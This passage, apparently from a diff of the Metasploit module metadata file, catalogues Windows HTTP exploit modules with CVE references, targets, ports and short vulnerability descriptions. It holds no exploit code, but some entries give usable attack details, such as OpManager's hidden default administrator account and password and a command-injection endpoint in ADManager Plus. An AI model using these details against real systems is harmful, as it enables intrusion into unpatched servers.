but only till you fill the threadpool.", - "references": [ - "CVE-2004-1561", - "OSVDB-10406", - "BID-11271", - "URL-http://archives.neohapsis.com/archives/bugtraq/2004-09/0366.html" - ], - "platform": "Windows", - "arch": "", - "rport": 8000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/icecast_header.rb", - "is_install_path": true, - "ref_name": "windows/http/icecast_header", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/integard_password_bof": { - "name": "Race River Integard Home/Pro LoginAdmin Password Stack Buffer Overflow", - "fullname": "exploit/windows/http/integard_password_bof", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-09-07", - "type": "exploit", - "author": [ - "Lincoln", - "Nullthreat", - "rick2600", - "corelanc0d3r ", - "jduck " - ], - "description": "This module exploits a stack buffer overflow in Race river's Integard Home/Pro\n internet content filter HTTP Server. Versions prior to 2.0.0.9037 and 2.2.0.9037 are\n vulnerable.\n\n The administration web page on port 18881 is vulnerable to a remote buffer overflow\n attack. By sending a long character string in the password field, both the structured\n exception handler and the saved extended instruction pointer are over written, allowing\n an attacker to gain control of the application and the underlying operating system\n remotely.\n\n The administration website service runs with SYSTEM privileges, and automatically\n restarts when it crashes.", - "references": [ - "OSVDB-67909", - "URL-http://www.corelan.be:8800/advisories.php?id=CORELAN-10-061" - ], - "platform": "Windows", - "arch": "", - "rport": 18881, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Targeting", - "Integard Home 2.0.0.9021", - "Integard Pro 2.2.0.9026" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/integard_password_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/integard_password_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/intersystems_cache": { - "name": "InterSystems Cache UtilConfigHome.csp Argument Buffer Overflow", - "fullname": "exploit/windows/http/intersystems_cache", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-09-29", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in InterSystems Cache 2009.1.\n By sending a specially crafted GET request, an attacker may be able to execute\n arbitrary code.", - "references": [ - "OSVDB-60549", - "BID-37177" - ], - "platform": "Windows", - "arch": "", - "rport": 57772, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows 2000 SP4 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/intersystems_cache.rb", - "is_install_path": true, - "ref_name": "windows/http/intersystems_cache", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/intrasrv_bof": { - "name": "Intrasrv 1.0 Buffer Overflow", - "fullname": "exploit/windows/http/intrasrv_bof", - "aliases": [], - "rank": 0, - "disclosure_date": "2013-05-30", - "type": "exploit", - "author": [ - "xis_one", - "PsychoSpy " - ], - "description": "This module exploits a boundary condition error in Intrasrv Simple Web\n Server 1.0. The web interface does not validate the boundaries of an\n HTTP request string prior to copying the data to an insufficiently sized\n buffer. Successful exploitation leads to arbitrary remote code execution\n in the context of the application.", - "references": [ - "OSVDB-94097", - "EDB-18397", - "BID-60229" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "v1.0 - XP / Win7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/intrasrv_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/intrasrv_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/ipswitch_wug_maincfgret": { - "name": "Ipswitch WhatsUp Gold 8.03 Buffer Overflow", - "fullname": "exploit/windows/http/ipswitch_wug_maincfgret", - "aliases": [], - "rank": 500, - "disclosure_date": "2004-08-25", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer overflow in IPswitch WhatsUp Gold 8.03. By\n posting a long string for the value of 'instancename' in the _maincfgret.cgi\n script an attacker can overflow a buffer and execute arbitrary code on the system.", - "references": [ - "CVE-2004-0798", - "OSVDB-9177", - "BID-11043" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "WhatsUP Gold 8.03 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb", - "is_install_path": true, - "ref_name": "windows/http/ipswitch_wug_maincfgret", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/ivanti_avalanche_filestoreconfig_upload": { - "name": "Ivanti Avalanche FileStoreConfig File Upload", - "fullname": "exploit/windows/http/ivanti_avalanche_filestoreconfig_upload", - "aliases": [], - "rank": 600, - "disclosure_date": "2023-04-24", - "type": "exploit", - "author": [ - "Piotr Bazydlo", - "Shelby Pace" - ], - "description": "Ivanti Avalanche prior to v6.4.0.186 permits MS-DOS style short\n names in the configuration path for the Central FileStore. Because of\n this, an administrator can change the default path to the web root\n of the applications, upload a JSP file, and achieve RCE as NT AUTHORITY\\SYSTEM.", - "references": [ - "URL-https://www.zerodayinitiative.com/advisories/ZDI-23-456/", - "URL-https://forums.ivanti.com/s/article/ZDI-CAN-17812-Ivanti-Avalanche-FileStoreConfig-Arbitrary-File-Upload-Remote-Code-Execution-Vulnerability?language=en_US", - "URL-https://attackerkb.com/topics/jcdcN9SN9V/cve-2023-28128", - "CVE-2023-28128" - ], - "platform": "Java,Windows", - "arch": "java", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Target" - ], - "mod_time": "2023-05-12 16:08:47 +0000", - "path": "/modules/exploits/windows/http/ivanti_avalanche_filestoreconfig_upload.rb", - "is_install_path": true, - "ref_name": "windows/http/ivanti_avalanche_filestoreconfig_upload", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/ivanti_epm_recordgoodapp_sqli_rce": { - "name": "Ivanti EPM RecordGoodApp SQLi RCE", - "fullname": "exploit/windows/http/ivanti_epm_recordgoodapp_sqli_rce", - "aliases": [], - "rank": 300, - "disclosure_date": "2024-05-24", - "type": "exploit", - "author": [ - "James Horseman", - "Christophe De La Fuente" - ], - "description": "Ivanti Endpoint Manager (EPM) 2022 SU5 and prior are vulnerable to unauthenticated SQL injection which can be leveraged to achieve unauthenticated remote code execution.", - "references": [ - "URL-https://forums.ivanti.com/s/article/Security-Advisory-May-2024", - "URL-https://www.zerodayinitiative.com/advisories/ZDI-24-507", - "URL-https://github.com/horizon3ai/CVE-2024-29824", - "URL-https://www.horizon3.ai/attack-research/attack-blogs/cve-2024-29824-deep-dive-ivanti-epm-sql-injection-remote-code-execution-vulnerability/", - "CVE-2024-29824" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Target" - ], - "mod_time": "2024-06-21 10:13:08 +0000", - "path": "/modules/exploits/windows/http/ivanti_epm_recordgoodapp_sqli_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/ivanti_epm_recordgoodapp_sqli_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/jira_collector_traversal": { - "name": "JIRA Issues Collector Directory Traversal", - "fullname": "exploit/windows/http/jira_collector_traversal", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-02-26", - "type": "exploit", - "author": [ - "Philippe Arteau", - "juan vazquez " - ], - "description": "This module exploits a directory traversal flaw in JIRA 6.0.3. The vulnerability exists\n in the issues collector code, while handling attachments provided by the user. It can be\n exploited in Windows environments to get remote code execution. This module has been tested\n successfully on JIRA 6.0.3 with Windows 2003 SP2 Server.", - "references": [ - "CVE-2014-2314", - "OSVDB-103807", - "BID-65849", - "URL-https://confluence.atlassian.com/display/JIRA/JIRA+Security+Advisory+2014-02-26", - "URL-http://blog.h3xstream.com/2014/02/jira-path-traversal-explained.html" - ], - "platform": "Windows", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Jira 6.0.3 / Windows 2003 SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/jira_collector_traversal.rb", - "is_install_path": true, - "ref_name": "windows/http/jira_collector_traversal", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/kaseya_uploader": { - "name": "Kaseya VSA uploader.aspx Arbitrary File Upload", - "fullname": "exploit/windows/http/kaseya_uploader", - "aliases": [], - "rank": 600, - "disclosure_date": "2015-09-23", - "type": "exploit", - "author": [ - "Pedro Ribeiro " - ], - "description": "This module exploits an arbitrary file upload vulnerability found in Kaseya VSA versions\n between 7 and 9.1. A malicious unauthenticated user can upload an ASP file to an arbitrary\n directory leading to arbitrary code execution with IUSR privileges. This module has been\n tested with Kaseya v7.0.0.17, v8.0.0.10 and v9.0.0.3.", - "references": [ - "CVE-2015-6922", - "ZDI-15-449", - "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/Kaseya/kaseya-vsa-vuln-2.txt", - "URL-https://seclists.org/bugtraq/2015/Sep/132" - ], - "platform": "Windows", - "arch": "x86", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Kaseya VSA v7 to v9.1" - ], - "mod_time": "2022-01-13 18:47:11 +0000", - "path": "/modules/exploits/windows/http/kaseya_uploader.rb", - "is_install_path": true, - "ref_name": "windows/http/kaseya_uploader", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/kaseya_uploadimage_file_upload": { - "name": "Kaseya uploadImage Arbitrary File Upload", - "fullname": "exploit/windows/http/kaseya_uploadimage_file_upload", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-11-11", - "type": "exploit", - "author": [ - "Thomas Hibbert " - ], - "description": "This module exploits an arbitrary file upload vulnerability found in Kaseya versions below\n 6.3.0.2. A malicious user can upload an ASP file to an arbitrary directory without previous\n authentication, leading to arbitrary code execution with IUSR privileges.", - "references": [ - "OSVDB-99984", - "BID-63782", - "EDB-29675", - "URL-http://security-assessment.com/files/documents/advisory/Kaseya%20File%20Upload.pdf" - ], - "platform": "Windows", - "arch": "x86", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Kaseya KServer / Windows" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb", - "is_install_path": true, - "ref_name": "windows/http/kaseya_uploadimage_file_upload", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/kentico_staging_syncserver": { - "name": "Kentico CMS Staging SyncServer Unserialize Remote Command Execution", - "fullname": "exploit/windows/http/kentico_staging_syncserver", - "aliases": [], - "rank": 600, - "disclosure_date": "2019-04-15", - "type": "exploit", - "author": [ - "Manoj Cherukuri", - "Justin LeMay", - "aushack " - ], - "description": "This module exploits a vulnerability in the Kentico CMS platform versions 12.0.14 and earlier.\n Remote Command Execution is possible via unauthenticated XML requests to the Staging Service\n SyncServer.asmx interface ProcessSynchronizationTaskData method stagingTaskData parameter. XML\n input is passed to an insecure .NET deserialize call which allows for remote command execution.", - "references": [ - "CVE-2019-10068", - "URL-https://www.aon.com/cyber-solutions/aon_cyber_labs/unauthenticated-remote-code-execution-in-kentico-cms/" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic", - "Windows EXE Dropper", - "Windows Command", - "Windows Powershell" - ], - "mod_time": "2023-02-10 18:04:31 +0000", - "path": "/modules/exploits/windows/http/kentico_staging_syncserver.rb", - "is_install_path": true, - "ref_name": "windows/http/kentico_staging_syncserver", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/kolibri_http": { - "name": "Kolibri HTTP Server HEAD Buffer Overflow", - "fullname": "exploit/windows/http/kolibri_http", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-12-26", - "type": "exploit", - "author": [ - "mr_me ", - "TheLeader", - "sinn3r " - ], - "description": "This exploits a stack buffer overflow in version 2 of the Kolibri HTTP server.", - "references": [ - "CVE-2002-2268", - "OSVDB-70808", - "BID-6289", - "EDB-15834" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows XP sp3", - "Windows Server 2003 sp2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/kolibri_http.rb", - "is_install_path": true, - "ref_name": "windows/http/kolibri_http", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/landesk_thinkmanagement_upload_asp": { - "name": "LANDesk Lenovo ThinkManagement Console Remote Command Execution", - "fullname": "exploit/windows/http/landesk_thinkmanagement_upload_asp", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-02-15", - "type": "exploit", - "author": [ - "Andrea Micalizzi", - "juan vazquez " - ], - "description": "This module can be used to execute a payload on LANDesk Lenovo\n ThinkManagement Suite 9.0.2 and 9.0.3.\n\n The payload is uploaded as an ASP script by sending a specially crafted\n SOAP request to \"/landesk/managementsuite/core/core.anonymous/ServerSetup.asmx\"\n , via a \"RunAMTCommand\" operation with the command '-PutUpdateFileCore'\n as the argument.\n\n After execution, the ASP script with the payload is deleted by sending\n another specially crafted SOAP request to \"WSVulnerabilityCore/VulCore.asmx\"\n via a \"SetTaskLogByFile\" operation.", - "references": [ - "CVE-2012-1195", - "CVE-2012-1196", - "OSVDB-79276", - "OSVDB-79277", - "BID-52023", - "EDB-18622", - "EDB-18623" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "LANDesk Lenovo ThinkManagement Suite 9.0.2 / 9.0.3 / Microsoft Windows Server 2003 SP2" - ], - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb", - "is_install_path": true, - "ref_name": "windows/http/landesk_thinkmanagement_upload_asp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/lexmark_markvision_gfd_upload": { - "name": "Lexmark MarkVision Enterprise Arbitrary File Upload", - "fullname": "exploit/windows/http/lexmark_markvision_gfd_upload", - "aliases": [], - "rank": 600, - "disclosure_date": "2014-12-09", - "type": "exploit", - "author": [ - "Andrea Micalizzi", - "juan vazquez " - ], - "description": "This module exploits a code execution flaw in Lexmark MarkVision Enterprise before version 2.1.\n A directory traversal vulnerability in the GfdFileUploadServlet servlet allows an unauthenticated\n attacker to upload arbitrary files, including arbitrary JSP code. This module has been\n tested successfully on Lexmark MarkVision Enterprise 2.0 with Windows 2003 SP2.", - "references": [ - "CVE-2014-8741", - "ZDI-14-410", - "URL-http://support.lexmark.com/index?page=content&id=TE666&locale=EN&userlocale=EN_US" - ], - "platform": "Windows", - "arch": "java", - "rport": 9788, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Lexmark Markvision Enterprise 2.0" - ], - "mod_time": "2021-02-17 12:33:59 +0000", - "path": "/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb", - "is_install_path": true, - "ref_name": "windows/http/lexmark_markvision_gfd_upload", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/lg_simple_editor_rce": { - "name": "LG Simple Editor Remote Code Execution", - "fullname": "exploit/windows/http/lg_simple_editor_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2023-08-24", - "type": "exploit", - "author": [ - "rgod", - "Ege Balcı " - ], - "description": "This Metasploit module exploits broken access control and directory traversal\n vulnerabilities in LG Simple Editor software for gaining code execution.\n The vulnerabilities exist in versions of LG Simple Editor prior to v3.21.\n By exploiting this flaw, an attacker can upload and execute a malicious JSP\n payload with the SYSTEM user permissions.", - "references": [ - "ZDI-23-1204", - "CVE-2023-40498" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "LG Simple Editor <= v3.21" - ], - "mod_time": "2023-09-07 17:00:17 +0000", - "path": "/modules/exploits/windows/http/lg_simple_editor_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/lg_simple_editor_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/lg_simple_editor_rce_uploadvideo": { - "name": "LG Simple Editor Command Injection (CVE-2023-40504)", - "fullname": "exploit/windows/http/lg_simple_editor_rce_uploadvideo", - "aliases": [], - "rank": 600, - "disclosure_date": "2023-08-04", - "type": "exploit", - "author": [ - "rgod", - "Michael Heinzl" - ], - "description": "Unauthenticated Command Injection in LG Simple Editor <= v3.21.0.\n The vulnerability can be exploited by a remote attacker to inject arbitrary operating system commands which will get executed in the context of NT AUTHORITY\\SYSTEM.", - "references": [ - "URL-https://www.zerodayinitiative.com/advisories/ZDI-23-1208/", - "CVE-2023-40504" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows_Fetch" - ], - "mod_time": "2024-08-13 20:29:30 +0000", - "path": "/modules/exploits/windows/http/lg_simple_editor_rce_uploadvideo.rb", - "is_install_path": true, - "ref_name": "windows/http/lg_simple_editor_rce_uploadvideo", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/mailenable_auth_header": { - "name": "MailEnable Authorization Header Buffer Overflow", - "fullname": "exploit/windows/http/mailenable_auth_header", - "aliases": [], - "rank": 500, - "disclosure_date": "2005-04-24", - "type": "exploit", - "author": [ - "David Maciejak " - ], - "description": "This module exploits a remote buffer overflow in the MailEnable web service.\n The vulnerability is triggered when a large value is placed into the Authorization\n header of the web request. MailEnable Enterprise Edition versions prior to 1.0.5 and\n MailEnable Professional versions prior to 1.55 are affected.", - "references": [ - "CVE-2005-1348", - "OSVDB-15913", - "OSVDB-15737", - "BID-13350", - "URL-http://www.nessus.org/plugins/index.php?view=single&id=18123" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "MEHTTPS.exe Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/mailenable_auth_header.rb", - "is_install_path": true, - "ref_name": "windows/http/mailenable_auth_header", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/manage_engine_opmanager_rce": { - "name": "ManageEngine OpManager Remote Code Execution", - "fullname": "exploit/windows/http/manage_engine_opmanager_rce", - "aliases": [], - "rank": 0, - "disclosure_date": "2015-09-14", - "type": "exploit", - "author": [ - "xistence " - ], - "description": "This module exploits a default credential vulnerability in ManageEngine OpManager, where a\n default hidden account \"IntegrationUser\" with administrator privileges exists. The account\n has a default password of \"plugin\" which cannot be reset through the user interface. By\n log-in and abusing the default administrator's SQL query functionality, it's possible to\n write a WAR payload to disk and trigger an automatic deployment of this payload. This\n module has been tested successfully on OpManager v11.0 and v11.4-v11.6 for Windows.", - "references": [ - "EDB-38174", - "CVE-2015-7765", - "CVE-2015-7766", - "URL-https://seclists.org/fulldisclosure/2015/Sep/66", - "URL-https://support.zoho.com/portal/manageengine/helpcenter/articles/pgsql-submitquery-do-vulnerability" - ], - "platform": "Java", - "arch": "java", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "ManageEngine OpManager <= v11.6" - ], - "mod_time": "2021-02-17 12:33:59 +0000", - "path": "/modules/exploits/windows/http/manage_engine_opmanager_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/manage_engine_opmanager_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/manageengine_adaudit_plus_authenticated_rce": { - "name": "ManageEngine ADAudit Plus Authenticated File Write RCE", - "fullname": "exploit/windows/http/manageengine_adaudit_plus_authenticated_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2021-10-01", - "type": "exploit", - "author": [ - "Moon", - "Erik Wynter" - ], - "description": "This module exploits security issues in ManageEngine ADAudit Plus\n prior to 7006 that allow authenticated users to execute arbitrary\n code by creating a custom alert profile and leveraging its custom\n alert script component.\n\n The module first runs a few checks to test the provided\n credentials, retrieve the configured domain(s) and obtain the\n build number of the target ADAudit Plus server.\n\n If the credentials are valid and the target is\n vulnerable, the module creates an alert profile that will be\n triggered for any failed login attempt to the configured domain.\n\n For versions prior to build 7004, the payload is directly inserted\n in the custom alert script component of the alert profile.\n\n For versions 7004 and 7005, the module leverages an arbitrary file\n write vulnerability (CVE-2021-42847) to create a Powershell script\n in the alert_scripts directory that contains the payload. The name\n of this script is then provided as the value for the custom alert\n script component of the alert profile.\n\n This module requires valid credentials for an account with the\n privileges to create alert scripts. It has been successfully tested\n against ManageEngine ADAudit Plus builds 7003 and 7005 running on\n Windows Server 2012 R2.\n\n Successful exploitation will result in RCE as the user running\n ManageEngine ADAudit Plus, which will typically be the local\n administrator.", - "references": [ - "CVE-2021-42847", - "URL-https://pitstop.manageengine.com/portal/en/community/topic/fix-released-for-a-vulnerability-in-manageengine-adaudit-plus", - "URL-https://www.manageengine.com/products/active-directory-audit/adaudit-plus-release-notes.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 8081, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Command" - ], - "mod_time": "2024-04-15 11:06:50 +0000", - "path": "/modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/manageengine_adaudit_plus_authenticated_rce", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "first-attempt-fail" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/manageengine_adaudit_plus_cve_2022_28219": { - "name": "ManageEngine ADAudit Plus CVE-2022-28219", - "fullname": "exploit/windows/http/manageengine_adaudit_plus_cve_2022_28219", - "aliases": [], - "rank": 600, - "disclosure_date": "2022-06-29", - "type": "exploit", - "author": [ - "Naveen Sunkavally", - "Ron Bowes" - ], - "description": "This module exploits CVE-2022-28219, which is a pair of\n vulnerabilities in ManageEngine ADAudit Plus versions before build\n 7060: a path traversal in the /cewolf endpoint, and a blind XXE in,\n to upload and execute an executable file.", - "references": [ - "CVE-2022-28219", - "URL-https://www.horizon3.ai/red-team-blog-cve-2022-28219/", - "URL-https://attackerkb.com/topics/Zx3qJlmRGY/cve-2022-28219/rapid7-analysis", - "URL-https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 8081, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Command" - ], - "mod_time": "2024-09-05 08:49:32 +0000", - "path": "/modules/exploits/windows/http/manageengine_adaudit_plus_cve_2022_28219.rb", - "is_install_path": true, - "ref_name": "windows/http/manageengine_adaudit_plus_cve_2022_28219", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection": { - "name": "ManageEngine ADManager Plus ChangePasswordAction Authenticated Command Injection", - "fullname": "exploit/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection", - "aliases": [], - "rank": 600, - "disclosure_date": "2023-04-12", - "type": "exploit", - "author": [ - "Simon Humbert", - "Dinh Hoang", - "Grant Willcox" - ], - "description": "ManageEngine ADManager Plus prior to build 7181 is vulnerable to an authenticated command injection due to insufficient\n validation of user input when performing the ChangePasswordAction function before passing it into a string that is later\n used as an OS command to execute.\n\n By making a POST request to /api/json/admin/saveServerSettings with a params POST\n parameter containing a JSON array object that has a USERNAME or PASSWORD element containing a\n carriage return and newline, followed by the command the attacker wishes to execute, an attacker can gain RCE as the user\n running ADManager Plus, which will typically be the local administrator.\n\n Note that the attacker must be authenticated in order to send requests to /api/json/admin/saveServerSettings,\n so this vulnerability does require authentication to exploit.\n\n As this exploit modifies the HTTP proxy settings for the entire server, one cannot use fetch payloads\n with this exploit, since these will use HTTP connections that will be affected by the change in configuration.", - "references": [ - "CVE-2023-29084", - "URL-https://hnd3884.github.io/posts/CVE-2023-29084-Command-injection-in-ManageEngine-ADManager-plus/", - "URL-https://www.zerodayinitiative.com/advisories/ZDI-23-438/", - "URL-https://www.manageengine.com/products/ad-manager/admanager-kb/cve-2023-29084.html", - "URL-https://www.manageengine.com/products/ad-manager/release-notes.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Command" - ], - "mod_time": "2023-06-01 16:59:14 +0000", - "path": "/modules/exploits/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection.rb", - "is_install_path": true, - "ref_name": "windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "config-changes" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/manageengine_adselfservice_plus_cve_2021_40539": { - "name": "ManageEngine ADSelfService Plus CVE-2021-40539", - "fullname": "exploit/windows/http/manageengine_adselfservice_plus_cve_2021_40539", - "aliases": [], - "rank": 600, - "disclosure_date": "2021-09-07", - "type": "exploit", - "author": [ - "Antoine Cervoise", - "Wilfried Bécard", - "mr_me", - "wvu " - ], - "description": "This module exploits CVE-2021-40539, a REST API authentication bypass\n vulnerability in ManageEngine ADSelfService Plus, to upload a JAR and\n execute it as the user running ADSelfService Plus - which is 